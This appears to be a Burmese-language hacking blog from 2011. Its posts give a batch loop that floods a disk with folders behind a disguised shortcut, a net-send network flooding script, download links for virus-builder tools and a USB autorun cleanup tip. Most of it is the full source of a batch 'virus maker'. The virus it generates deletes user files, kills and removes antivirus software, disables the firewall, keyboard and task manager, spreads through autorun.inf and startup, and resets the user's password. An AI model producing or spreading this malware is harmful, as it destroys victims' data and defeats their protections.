စသျဖင့္ ေဖာ္ျပေပးထားတဲ့ဟာအုပ္ျဖစ္ပါတယ္။
အစ္ကို ညီေနမင္းရဲ႕ဆိုဒ္က ေနျပန္လည္ကူးယူေဖာ္ျပေပးလိုက္ပါတယ္ခင္ဗ်ာ။

Download Here
Read More ->>

Sunday, December 11, 2011

Make 1000 folders in a few seconds - Virus

ကၽြန္ေတာ္တို႕ folder ေတြေထာင္ခ်ီျပီးေတာ့ second အနည္းငယ္အတြင္းပြားမ်ားေအာင္းလုပ္ရေအာင္။
မေၾကာက္ပါနဲ႕ ဖိုင္ေတြကအလြတ္ေတြပါ။ဘာမွ်မပါ ပါဘူး။လုပ္ျပီးရင္ အျမန္ပိတ္ဖို႕သာစဥ္းစားပါ။
ေနာက္ေနတာသြားမစမ္းနဲ႕။စမ္းခ်င္ရင္ Deepfreeze လိုတယ္။
Deepfreeze ရိွရင္ေတာ့ အတိုင္းထက္အလြန္ေကာင္းတာေပါ့။

Don't try this on your computer!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

စမယ္ေနာ္။....................

(၁)။ Notepad ကိုဖြင့္လိုက္ပါ။
ျပီးရင္ေအာက္ကကုတ္ေတြကိုတင္ျပီးေတာ့ .bat ဖိုင္နဲ႕ ေဆ့လိုက္ပါ။

code:
@echo off
:top
md %random%
goto :top

@echo off ဆိုတာမ်က္စိရႈပ္သက္သာေအာင္လို႕ပဲမွတ္ထားပါ။
:top  ဆိုတာ sub program ျပီးနာမည္တစ္ခုသတ္မွတ္ေပးလိုက္တာပါ။
md%random% ဆိုေတြကို က်ရာအေနအထား(random) လုပ္ေပးမွာပါ။
goto :top ဆိုတာ ဒုတိယလိုင္းက :top ဆိုတဲ့ sub program ဆီျပန္သြားတာျဖစ္ပါတယ္။
ဒါကို loop လုပ္တယ္လိုေခၚပါတယ္။အက်ယ္ေလ့လာခ်င္ရင္ ဒီမွာ သြားေလ့လာပါ။


ျပီးရင္ဆက္သြားလိုက္ၾကရေအာင္။


(၂)ေနာက္ျပီး ေခြးသြားစိတ္ပံုဖိုင္ေလးနဲ႕ သင္ေဆ့ထားတဲ့ အေကာင္ေလးကိုရပါလိမ့္မယ္။အဲဒီဖိုင္ေလးေပၚ ညာကလစ္ေထာက္လိုက္ပါ။


(၃) create shortcut ကိုကလစ္လိုက္ပါ။ျပီးရင္ေပၚလာတဲ့ shortcut ေပၚမွာညာကလစ္ေထာက္ျပီးေတာ့
properties ထဲ၀င္ျပီး change icon ကိုကလစ္ျပီး icon ေျပာင္းထားလိုက္ပါ။
ဥပမာ သီခ်င္းလိုလို ဘာလိုလိုေပါ့။


မွားျပီးကလစ္လိုက္ရင္ေအာက္ကပံုလိုျဖစ္သြားလိမ့္မယ္။


Shwekoyantaw
http://shwekoyantaw.blogspot.com

Read More ->>

Monday, December 5, 2011

ေဆာ့၀ဲတိုင္းကို Virus Scan စစ္ပါ။

ေဆာ့၀ဲမွမဟုတ္ဘူး ေဒါင္းလုပ္ လုပ္တဲ့ဖိုင္မွန္သမွ် scan စစ္သင့္ပါတယ္။online သံုးေနရင္ အႏၱရာယ္ဆိုတာ လက္တကမ္းမွာရိွပါတယ္။ ဥပမာ သင္ေဒါင္းခ်လိုက္တဲ့ဖိုင္ေတြထဲမွာ binder ေတြကိုသံုးထားျပီး အႏၱရာယ္ရိွႏိုင္တာေတြကို binding လုပ္ထားရင္ သင္အဲဒီဖိုင္ကိုဖြင့္လိုက္တာနဲ႕ မလိုလားအပ္တာေတြကိုသင္ၾကံဳရႏိုင္ပါတယ္။ ဒါေၾကာင့္ဘာပဲေဒါင္းေဒါင္း scan အရင္စစ္ၾကပါဆို႕။
ရမ္းသမ္းျပီးမဖြင့္ၾကပါနဲ႔လို႕။
ေအာက္ကဆိုက္မွာ စစ္လိုက္ၾကပါ။
http://myavscan.net/
Read More ->>

Sunday, December 4, 2011

Recycler Virus အေၾကာင္း

memory စတစ္ကို format ခ်င္ေတာင္မွမေသတဲ့ virous ၇ွိေနပါတယ္ နာမည္က
>
> recycler
>
> copy shortcut 1
> copy shortcut 2
> copy shortcut 3
> copy shortcut 4
> autorun .inf
>
> လို့ေပါ ္ေနျပီး mini window xp ေပါ ္မွာ သတ္ရင္လည္း မ၇ပါ  avira /
> kasper/ avg/ norton/ bitdefender/ unlocker / တို ့နဲ့ သတ္ရင္လည္း
> delete လုပ္ျပီး ၃ စကၠန္ ့ေလာက္ျကာရင္ ျပန္ေရာက္လာပါတယ္


                                            Answer


Run box  မွာ  cmd လုိ ့ရုိက္လုိက္ပါ ။
အမဲေရာင္မ်က္ႏွာျပင္နဲ ့ command box က်လာပါမယ္ ။
အဲ့ဒီမွာ _ ( cursor )  ခ်ထားတဲ့ေနရာမွာ usb stick ရဲ  ့location ( ဥပမာ F or E )
F ျဖစ္လ်င္

F:\attrib -s -r -h *.*   လုိ ့ရုိက္ၿပီး enter ႏွိပ္ပါ 

အဲ့ဒီ အခါမွာ malicious EXE ဖုိင္ေတြအမ်ားႀကီး က်လာပါမယ္ ။
တကယ္လုိ ့ကိုယ္မလုိအပ္တဲ့ဖုိင္ဆိုရင္ F:\del autorun.inf  လုိ ့ရိုက္ၿပီး ( enter ႏွိပ္ ) ဖ်က္ပါ ။
 autorun.inf ေနရာမွာ မလုိအပ္တဲ့ malicous EXE ဖုိင္နာမည္ကို ရိုက္လုိ ့ရပါတယ္ ။

ဖ်က္ၿပီးတာနဲ ့ usb ကို ခ်က္ျခင္းျဖဳတ္လုိက္ပါ ။ 

ေနာက္တစ္ခါ virus မ၀င္ေအာင္ စက္ကုိ virus သတ္ပါ ။ usb ကုိလဲ ထိုးလိုက္တာနဲ ့ခ်က္ျခင္း မပြင့္ေအာင္ လုပ္ထားပါ ။ 
source @ http://mcxeros.multiply.com
Read More ->>

Friday, November 25, 2011

L337_virus creator

http://i275.photobucket.com/albums/jj299/silverfish4/Untitled-1-18.jpg



Tool အသစ္ပါသံုးရတာေတာ့လြယ္ပါတယ္။ဒါေပမယ့္နည္းနညး္ေတာ့ အေျခခံလိုပါတယ္။
ေအာက္ကလင့္ေတြကေနေဒါင္းလို႔ရပါတယ္။
http://www.ziddu.com/download/17536757/L337_viruscreator.rar.html
http://uploading.com/files/7KO7NNNW/L337...r.rar.html
Read More ->>

Wednesday, November 16, 2011

Strikethrough's Batch Virus Generator v1

Program Futures
  • Infection of extensions.
  • Deletion of extensions.
  • Task kills.
  • Corruption of extensions.
  • And much more!
download link:
http://www.mediafire.com/?rm2agay5omcz571
Read More ->>

Friday, November 4, 2011

Network flooding script


flood network
ကိုယ္ နက္၀က္ကိုtemporarily flood network ျဖစ္သြားေအာင္လုပ္တာပါ
ကဲ notepad ကိုဖြင့္လိုက္ပါ 
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ကိုကူးျပီးေတာ့
networkflood.bat နဲ့ save လိုက္
ေရလြမ္းသြားမယ္
ေရးသားသူ
ကိုေနေသာ္ေအာင္။
Myanmar hacker forum
Read More ->>

Saturday, October 29, 2011

virus creator tool တစ္ခုကို ကိုယ္တိုင္ notepad သံုးျပီးေရးမယ္။

ေအာက္ကကုတ္ေတြကိုကူး ျပီးရင္ ကိုယ္ၾကိဳက္တဲ့အမည္နဲ႕ .bat လို႕ေဆ့လိုက္
ဥပမာ  example.bat
ကဲ ကုတ္ေတြကေအာက္ကစပါတယ္။

@echo off
start speech.vbs
color 0a
title Batch Virus Maker 0.1v (beta)
echo.
echo                   ##     ## #### ########  ##     ##  ###### 
echo                   ##     ##  ##  ##     ## ##     ## ##    ##
echo                   ##     ##  ##  ##     ## ##     ## ##      
echo                   ##     ##  ##  ########  ##     ##  ###### 
echo                    ##   ##   ##  ##   ##   ##     ##       ##
echo                     ## ##    ##  ##    ##  ##     ## ##    ##
echo                      ###    #### ##     ##  #######   ######
echo.
echo                  ##     ##    ###    ##    ## ######## ######## 
echo                  ###   ###   ## ##   ##   ##  ##       ##     ##
echo                  #### ####  ##   ##  ##  ##   ##       ##     ##
echo                  ## ### ## ##     ## #####    ######   ######## 
echo                  ##     ## ######### ##  ##   ##       ##   ##  
echo                  ##     ## ##     ## ##   ##  ##       ##    ## 
echo                  ##     ## ##     ## ##    ## ######## ##     ##
echo                                                    1.0vshwekoyantaw
echo.
echo             ........................................................
echo.
echo Type a title for your virus:
set /p name=Name:
echo.
echo @echo off > %name%.bat
echo title %name% >> %name%.bat
echo.
:bcolor
cls
echo.
echo What is the Background Color of your Program:
echo.
echo 0 = Black
echo 1 = Blue
echo 2 = Green
echo 3 = Aqua
echo 4 = Red
echo 5 = Purple
echo 6 = Yellow
echo 7 = White
echo 8 = Gray
echo 9 = Light Blue
echo a = Light Green
echo b = Light Aqua
echo c = Light Red
echo d = Light Purple
echo e = Light Yellow
echo f = Bright White
echo.
set /p bcolor=Background Color:
if %bcolor% == 0 goto tcolor
if %bcolor% == 1 goto tcolor
if %bcolor% == 2 goto tcolor
if %bcolor% == 3 goto tcolor
if %bcolor% == 4 goto tcolor
if %bcolor% == 5 goto tcolor
if %bcolor% == 6 goto tcolor
if %bcolor% == 7 goto tcolor
if %bcolor% == 8 goto tcolor
if %bcolor% == 9 goto tcolor
if %bcolor% == a goto tcolor
if %bcolor% == b goto tcolor
if %bcolor% == c goto tcolor
if %bcolor% == d goto tcolor
if %bcolor% == e goto tcolor
if %bcolor% == f goto tcolor
msg * Color not found!
goto bcolor
:tcolor
cls
echo.
echo What is the Text Color of your Program:
echo.
echo 0 = Black
echo 1 = Blue
echo 2 = Green
echo 3 = Aqua
echo 4 = Red
echo 5 = Purple
echo 6 = Yellow
echo 7 = White
echo 8 = Gray
echo 9 = Light Blue
echo a = Light Green
echo b = Light Aqua
echo c = Light Red
echo d = Light Purple
echo e = Light Yellow
echo f = Bright White
echo.
set /p tcolor=Text Color:
if %tcolor% == 0 goto color
if %tcolor% == 1 goto color
if %tcolor% == 2 goto color
if %tcolor% == 3 goto color
if %tcolor% == 4 goto color
if %tcolor% == 5 goto color
if %tcolor% == 6 goto color
if %tcolor% == 7 goto color
if %tcolor% == 8 goto color
if %tcolor% == 9 goto color
if %tcolor% == a goto color
if %tcolor% == b goto color
if %tcolor% == c goto color
if %tcolor% == d goto color
if %tcolor% == e goto color
if %tcolor% == f goto color
msg * Color not found!
goto tcolor
:color
echo color %bcolor%%tcolor% >> %name%.bat
:start
set command=123456
cls
echo.
time /t
date /t
echo.
echo Choose A Command Number To Add:
echo.
echo 0 - Donate To Creator
echo 1 - Delete My Documents
echo 2 - Delete All Music
echo 3 - Delete All Pictures
echo 4 - Disable Firewall
echo 5 - Disable Internet
echo 6 - Disable Keyboard
echo 7 - Block Google
echo 8 - Block Facebook
echo 9 - Block Youtube
echo 10 - Open Notepad Looply
echo 11 - Kill Antivirus System
echo 12 - Spam C: Drive
echo 13 - Kill Explorer.exe
echo 14 - Open Any website Looply
echo 15 - Disable Taskmanager
echo 16 - Infect All Drivers
echo 17 - Infect All Folders
echo 18 - Infect Startup Folder
echo 19 - Swap Mouse Buttons
echo 20 - Change Current Userpass
echo 21 - Hide Virus File After Run
echo 22 - Spam With MsgBox
echo 23 - Open/Close Disk Tray
echo.
set /p command=Command to add:
if %command% == 0 goto cmd0
if %command% == 1 goto cmd1
if %command% == 2 goto cmd2
if %command% == 3 goto cmd3
if %command% == 4 goto cmd4
if %command% == 5 goto cmd5
if %command% == 6 goto cmd6
if %command% == 7 goto cmd7
if %command% == 8 goto cmd8
if %command% == 9 goto cmd9
if %command% == 10 goto cmd10
if %command% == 11 goto cmd11
if %command% == 12 goto cmd12
if %command% == 13 goto cmd13
if %command% == 14 goto cmd14
if %command% == 15 goto cmd15
if %command% == 16 goto cmd16
if %command% == 17 goto cmd17
if %command% == 18 goto cmd18
if %command% == 19 goto cmd19
if %command% == 20 goto cmd20
if %command% == 21 goto cmd21
if %command% == 22 goto cmd22
if %command% == 23 goto cmd23
msg * Command Not Found
goto start
:cmd0
cls
start http://www.hackcommunity.com/User-Anonymous-227
msg * Coded For HackCommunity Members
goto start
:cmd1
cls
echo.
echo Please Wait
echo.
echo del /f /q "C:\Users\%userprofile%\My Documents\*.*" >> %name%.bat
msg * Command Added!
goto start
:cmd2
cls
echo.
echo Please Wait
echo.
echo del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*" >> %name%.bat
msg * Command Added!
goto start
:cmd3
cls
echo.
echo Please Wait
echo.
echo del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*" >> %name%.bat
msg * Command Added!
goto start
:cmd4
cls
echo.
echo Please Wait
echo.
echo net stop "MpsSvc" >> %name%.bat
echo taskkill /f /t /im "FirewallControlPanel.exe" >> %name%.bat
msg * Command Added!
goto start
:cmd5
cls
echo.
echo Please Wait
echo.
echo ipconfig /release >> %name%.bat
echo if ERRORLEVEL1 ipconfig /release_all >> %name%.bat
msg * Command Added!
goto start
:cmd6
cls
echo.
echo Please Wait
echo.
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg" >> %name%.bat
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg" >> %name%.bat
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg" >> %name%.bat
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg" >> %name%.bat
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg" >> %name%.bat
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg" >> %name%.bat
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg" >> %name%.bat
echo start nokeyboard.reg
msg * Command Added!
goto start
:cmd7
cls
echo.
echo Please Wait
echo.
echocd "C:\Windows\System32\Drivers\etc" >> %name%.bat
echo 127.0.0.1 google.com >> "Hosts">> %name%.bat
echo 127.0.0.1 http://www.google.com >> "Hosts" >> %name%.bat
msg * Command Added!
goto start
:cmd8
cls
echo.
echo Please Wait
echo.
echocd "C:\Windows\System32\Drivers\etc" >> %name%.bat
echo 127.0.0.1 google.com >> "Hosts">> %name%.bat
echo 127.0.0.1 http://www.facebook.com >> "Hosts" >> %name%.bat
msg * Command Added!
goto start
:cmd9
cls
echo.
echo Please Wait
echo.
echo cd "C:\Windows\System32\Drivers\etc" >> %name%.bat
echo 127.0.0.1 google.com >> "Hosts">> %name%.bat
echo 127.0.0.1 http://www.youtube.com >> "Hosts" >> %name%.bat
msg * Command Added!
goto start
:cmd10
cls
echo.
echo Please Wait
echo.
echo :loop >> %name%.bat
echo start notepad.exe >> %name%.bat
echo goto loop >> %name%.bat
msg * Command Added!
goto start
:cmd11
cls
echo.
echo Please Wait
echo.
echo CLS >> %name%.bat
echo taskkill /F /IM av* >NUL >> %name%.bat
echo taskkill /F /IM fire* >NUL >> %name%.bat
echo taskkill /F /IM anti* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM spy* >NUL >> %name%.bat
echo taskkill /F /IM bullguard* >NUL >> %name%.bat
echo taskkill /F /IM PersFw* >NUL >> %name%.bat
echo taskkill /F /IM KAV* >NUL >> %name%.bat
echo taskkill /F /IM ZONEALARM* >NUL >> %name%.bat
echo taskkill /F /IM SAFEWEB* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM OUTPOST* >NUL >> %name%.bat
echo taskkill /F /IM nv* >NUL >> %name%.bat
echo taskkill /F /IM nav* >NUL >> %name%.bat
echo taskkill /F /IM F-* >NUL >> %name%.bat
echo taskkill /F /IM ESAFE* >NUL >> %name%.bat
echo taskkill /F /IM cle* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM BLACKICE* >NUL >> %name%.bat
echo taskkill /F /IM def* >NUL >> %name%.bat
echo taskkill /F /IM kav* >NUL >> %name%.bat
echo taskkill /F /IM kav* >NUL >> %name%.bat
echo taskkill /F /IM avg* >NUL >> %name%.bat
echo taskkill /F /IM ash* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM aswupdsv* >NUL >> %name%.bat
echo taskkill /F /IM ewid* >NUL >> %name%.bat
echo taskkill /F /IM guar* >NUL >> %name%.bat
echo taskkill /F /IM gcasDt* >NUL >> %name%.bat
echo taskkill /F /IM msmp* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM mcafe* >NUL >> %name%.bat
echo taskkill /F /IM mghtml* >NUL >> %name%.bat
echo taskkill /F /IM msiexec* >NUL >> %name%.bat
echo taskkill /F /IM outpost* >NUL >> %name%.bat
echo taskkill /F /IM isafe* >NUL >> %name%.bat
echo taskkill /F /IM zap* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM zauinst* >NUL >> %name%.bat
echo taskkill /F /IM upd* >NUL >> %name%.bat
echo taskkill /F /IM zlclien* >NUL >> %name%.bat
echo taskkill /F /IM minilog* >NUL >> %name%.bat
echo taskkill /F /IM cc* b >NUL >> %name%.bat
echo taskkill /F /IM norton* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM norton au* >NUL >> %name%.bat
echo taskkill /F /IM ccc* >NUL >> %name%.bat
echo taskkill /F /IM npfmn* >NUL >> %name%.bat
echo taskkill /F /IM loge* >NUL >> %name%.bat
echo taskkill /F /IM nisum* >NUL >> %name%.bat
echo taskkill /F /IM issvc* >NUL >> %name%.bat
echo taskkill /F /IM tmp* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM tmn* >NUL >> %name%.bat
echo taskkill /F /IM pcc* >NUL >> %name%.bat
echo taskkill /F /IM cpd* >NUL >> %name%.bat
echo taskkill /F /IM pop* >NUL >> %name%.bat
echo taskkill /F /IM pav* >NUL >> %name%.bat
echo taskkill /F /IM padmin* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM panda* >NUL >> %name%.bat
echo taskkill /F /IM avsch* >NUL >> %name%.bat
echo taskkill /F /IM sche* >NUL >> %name%.bat
echo taskkill /F /IM syman* >NUL >> %name%.bat
echo taskkill /F /IM virus* >NUL >> %name%.bat
echo taskkill /F /IM realm* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo taskkill /F /IM sweep* >NUL >> %name%.bat
echo taskkill /F /IM scan* >NUL >> %name%.bat
echo taskkill /F /IM ad-* >NUL >> %name%.bat
echo taskkill /F /IM safe* >NUL >> %name%.bat
echo taskkill /F /IM avas* >NUL >> %name%.bat
echo taskkill /F /IM norm* >NUL >> %name%.bat
echo taskkill /F /IM offg* >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\alwils~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\kasper~1" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\trojan~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\f-prot95" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\tbav" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\avpersonal" /S >NUL >> %name%.bat
echo echoRMDIR /Q "C:\Program Files\Norton~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\Mcafee" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\Norton~1" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\avgamsr" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\avgemc" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\avgcc" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\grisoft" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\nood32krn" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\nood32" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\nod32" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\nood32" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\kav" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\kavmm" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\kaspersky" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\guard" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\ewido" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\pavprot" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\avengine" /S >NUL >> %name%.bat
echo CLS >> %name%.bat
echo RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\webproxy" /S >NUL >> %name%.bat
echo RMDIR /Q "C:\Program Files\panda software" /S >NUL >> %name%.bat
msg * Command Added!
goto start
:cmd12
cls
echo.
echo Please Wait
echo.
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
echo echo %random% > "C:\%random%Spammed Filetype" >> %name%.bat
msg * Command Added!
goto start
:cmd13
cls
echo.
echo Please Wait
echo.
echo taskkill explorer.exe >> %name%.bat
msg * Command Added!
goto start
:cmd14
cls
echo.
echo Enter Any Website URL:
echo.
set /p url=URL:
echo.
echo :A >> %name%.bat
echo start %URL% >> %name%.bat
echo goto :A >> %name%.bat
msg * Command Added!
goto start
:cmd15
cls
echo.
echo Please Wait
echo.
echo rem Disable Task Manager >> %name%.bat
echo reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul >> %name%.bat
msg * Command Added!
goto start
:cmd16
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Infect All Drives >> %name%.bat
echo for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( >> %name%.bat
echo copy /Y %0 %%E:\ >> %name%.bat
echo echo [AutoRun] > %%E:\autorun.inf >> %name%.bat
echo echo open="%%E:\%0" >> %%E:\autorun.inf >> %name%.bat
echo echo action=Open folder to see files... >> %%E:\autorun.inf) >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd17
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Infect All Folders >> %name%.bat
echo Dir %SystemRoot% /s /b > PathHost >> %name%.bat
echo For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul >> %name%.bat
echo Del /f /s /q PathHost > Nul >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd18
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Infect Startup Folder >> %name%.bat
echo copy %0 "%userprofile%\Start Menu\Programs\Startup" >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd19
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Swap Mouse Buttons >> %name%.bat
echo RUNDLL32 USER32.DLL,SwapMouseButton >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd20
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Change User Password To Ano >> %name%.bat
echo net user %username% Ano >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd21
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Hide Virus File After Run >> %name%.bat
echo attrib +h %0 >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd22
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
echo rem Spam With VBScript Msgboxes >> %name%.bat
echo echo Do>>msgbox.vbs >> %name%.bat
echo echo x=msgbox("Your computer is infected with a virus!",0+48,"Infected") >>msgbox.vbs >> %name%.bat
echo echo Loop>>msgbox.vbs >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo start "" "msgbox.vbs" >> %name%.bat
echo rem --------------------------------- >> %name%.bat
msg * Command Added!
goto start
:cmd23
cls
echo.
echo Please Wait
echo.
echo rem --------------------------------- >> %name%.bat
